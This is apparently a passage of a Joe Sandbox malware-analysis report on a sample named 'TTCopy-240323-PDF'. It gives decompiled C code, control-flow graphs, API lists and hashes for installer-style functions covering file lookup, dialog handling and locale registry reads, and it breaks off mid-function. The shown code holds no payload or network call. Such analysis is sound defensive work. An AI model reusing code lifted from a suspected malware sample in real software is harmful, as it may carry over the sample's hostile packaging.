                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407364
                                                                                            0x00407367
                                                                                            0x0040736a
                                                                                            0x0040736d
                                                                                            0x00407370
                                                                                            0x00407373
                                                                                            0x00407374
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407379
                                                                                            0x0040737c
                                                                                            0x0040737f
                                                                                            0x00407382
                                                                                            0x00407385
                                                                                            0x00407389
                                                                                            0x0040738b
                                                                                            0x0040738e
                                                                                            0x00000000
                                                                                            0x00407390
                                                                                            0x00000000
                                                                                            0x00407390
                                                                                            0x0040738e
                                                                                            0x004075c3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406bf2

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                            • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                            • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                            • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                                                                            0x004069a9
                                                                                            0x004069b2
                                                                                            0x00000000
                                                                                            0x004069bf
                                                                                            0x004069b5
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(746AFAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560), ref: 004069A9
                                                                                            • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID:
                                                                                            • API String ID: 2295610775-0
                                                                                            • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                            • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                            • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                            • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                                                                            C-Code - Quality: 84%
                                                                                            			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                                                                            0x004040d0
                                                                                            0x004040d7
                                                                                            0x0040423e
                                                                                            0x00404242
                                                                                            0x00404246
                                                                                            0x00404248
                                                                                            0x0040424d
                                                                                            0x00404258
                                                                                            0x00404263
                                                                                            0x00404268
                                                                                            0x0040426a
                                                                                            0x0040426c
                                                                                            0x0040426f
                                                                                            0x00404274
                                                                                            0x00404282
                                                                                            0x0040428f
                                                                                            0x00404296
                                                                                            0x00404296
                                                                                            0x00404297
                                                                                            0x00404297
                                                                                            0x0040429c
                                                                                            0x004042a2
                                                                                            0x004042a9
                                                                                            0x004042af
                                                                                            0x004042b1
                                                                                            0x004042f1
                                                                                            0x004042f6
                                                                                            0x004042fb
                                                                                            0x004042fb
                                                                                            0x00404300
                                                                                            0x00404309
                                                                                            0x0040430b
                                                                                            0x00404310
                                                                                            0x00404316
                                                                                            0x0040431a
                                                                                            0x0040431a
                                                                                            0x0040431f
                                                                                            0x00404325
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404330
                                                                                            0x00404336
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040433f
                                                                                            0x00404347
                                                                                            0x0040434c
                                                                                            0x0040434f
                                                                                            0x00404355
                                                                                            0x0040435a
                                                                                            0x0040435d
                                                                                            0x00404363
                                                                                            0x00404368
                                                                                            0x0040436b
                                                                                            0x00404371
                                                                                            0x00404379
                                                                                            0x0040437f
                                                                                            0x00404385
                                                                                            0x00404389
                                                                                            0x00404390
                                                                                            0x00404390
                                                                                            0x00404390
                                                                                            0x0040439a
                                                                                            0x004043ac
                                                                                            0x004043b8
                                                                                            0x004043bd
                                                                                            0x004043c7
                                                                                            0x004043cd
                                                                                            0x004043cf
                                                                                            0x004043d4
                                                                                            0x004043d1
                                                                                            0x004043d1
                                                                                            0x004043d1
                                                                                            0x004043e4
                                                                                            0x004043fc
                                                                                            0x004043fe
                                                                                            0x00404404
                                                                                            0x00404419
                                                                                            0x00404406
                                                                                            0x0040440f
                                                                                            0x00404411
                                                                                            0x00404411
                                                                                            0x0040441f
                                                                                            0x00404430
                                                                                            0x00404446
                                                                                            0x0040444d
                                                                                            0x00404453
                                                                                            0x00404457
                                                                                            0x0040445c
                                                                                            0x0040445e
                                                                                            0x00000000
                                                                                            0x00404464
                                                                                            0x00404464
                                                                                            0x00404466
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040446c
                                                                                            0x00404470
                                                                                            0x00404495
                                                                                            0x0040449b
                                                                                            0x004044a1
                                                                                            0x004044a3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004044c9
                                                                                            0x004044cf
                                                                                            0x004044d1
                                                                                            0x004044d6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004044dc
                                                                                            0x004044df
                                                                                            0x004044e2
                                                                                            0x004044f9
                                                                                            0x00404505
                                                                                            0x0040451e
                                                                                            0x00404524
                                                                                            0x00404528
                                                                                            0x0040452d
                                                                                            0x00404533
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040453d
                                                                                            0x00404548
                                                                                            0x00000000
                                                                                            0x00404548
                                                                                            0x00404472
                                                                                            0x00404478
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040447e
                                                                                            0x00404484
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040448a
                                                                                            0x0040445e
                                                                                            0x00404555
                                                                                            0x00404561
                                                                                            0x00404568
                                                                                            0x00000000
                                                                                            0x004042b3
                                                                                            0x004042b3
                                                                                            0x004042b6
                                                                                            0x004042e9
                                                                                            0x004042e9
                                                                                            0x004042eb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004042eb
                                                                                            0x004042b8
                                                                                            0x004042bc
                                                                                            0x004042c1
                                                                                            0x004042c3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004042d3
                                                                                            0x004042db
                                                                                            0x00000000
                                                                                            0x004042e1
                                                                                            0x004040e9
                                                                                            0x004040e9
                                                                                            0x004040ed
                                                                                            0x004040f2
                                                                                            0x00404101
                                                                                            0x00404101
                                                                                            0x00404107
                                                                                            0x0040410e
                                                                                            0x00404152
                                                                                            0x00404158
                                                                                            0x00404171
                                                                                            0x00404174
                                                                                            0x00404187
                                                                                            0x0040418d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404193
                                                                                            0x0040419e
                                                                                            0x004041a0
                                                                                            0x004041a2
                                                                                            0x004041c1
                                                                                            0x004041c1
                                                                                            0x004041c4
                                                                                            0x004041c9
                                                                                            0x004041cc
                                                                                            0x004041dc
                                                                                            0x004041dd
                                                                                            0x004041df
                                                                                            0x00404215
                                                                                            0x00404225
                                                                                            0x00000000
                                                                                            0x00404225
                                                                                            0x004041e1
                                                                                            0x004041e7
                                                                                            0x00404200
                                                                                            0x00404205
                                                                                            0x00404207
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404209
                                                                                            0x004041f5
                                                                                            0x004041f5
                                                                                            0x004041f7
                                                                                            0x004041f7
                                                                                            0x00000000
                                                                                            0x004041f7
                                                                                            0x004041ea
                                                                                            0x004041ef
                                                                                            0x00000000
                                                                                            0x004041ef
                                                                                            0x004041ce
                                                                                            0x004041d4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004041d6
                                                                                            0x00000000
                                                                                            0x004041d6
                                                                                            0x004041c6
                                                                                            0x00000000
                                                                                            0x004041c6
                                                                                            0x004041ac
                                                                                            0x004041b3
                                                                                            0x004041b9
                                                                                            0x004041bb
                                                                                            0x00404591
                                                                                            0x00000000
                                                                                            0x00404591
                                                                                            0x00000000
                                                                                            0x004041bb
                                                                                            0x00404179
                                                                                            0x00000000
                                                                                            0x00404181
                                                                                            0x00404160
                                                                                            0x00404166
                                                                                            0x0040456e
                                                                                            0x0040456e
                                                                                            0x00404574
                                                                                            0x00404581
                                                                                            0x00404587
                                                                                            0x00404587
                                                                                            0x00000000
                                                                                            0x00404110
                                                                                            0x00404115
                                                                                            0x00404121
                                                                                            0x0040412a
                                                                                            0x0040422b
                                                                                            0x00000000
                                                                                            0x00404149
                                                                                            0x0040414c
                                                                                            0x00000000
                                                                                            0x0040414c
                                                                                            0x0040412a
                                                                                            0x0040410e

                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                            • ShowWindow.USER32(?), ref: 00404121
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                            • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                            • DestroyWindow.USER32 ref: 00404160
                                                                                            • SetWindowLongW.USER32 ref: 00404179
                                                                                            • GetDlgItem.USER32 ref: 00404198
                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                            • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                            • GetDlgItem.USER32 ref: 0040425E
                                                                                            • GetDlgItem.USER32 ref: 00404268
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                            • GetDlgItem.USER32 ref: 00404379
                                                                                            • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                            • EnableWindow.USER32(?,?), ref: 004043AC
                                                                                            • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                            • EnableMenuItem.USER32 ref: 004043E4
                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                            • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                            • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                            • String ID: H7B
                                                                                            • API String ID: 2475350683-2300413410
                                                                                            • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                            • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                            • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                            • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                                                                            C-Code - Quality: 96%
                                                                                            			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
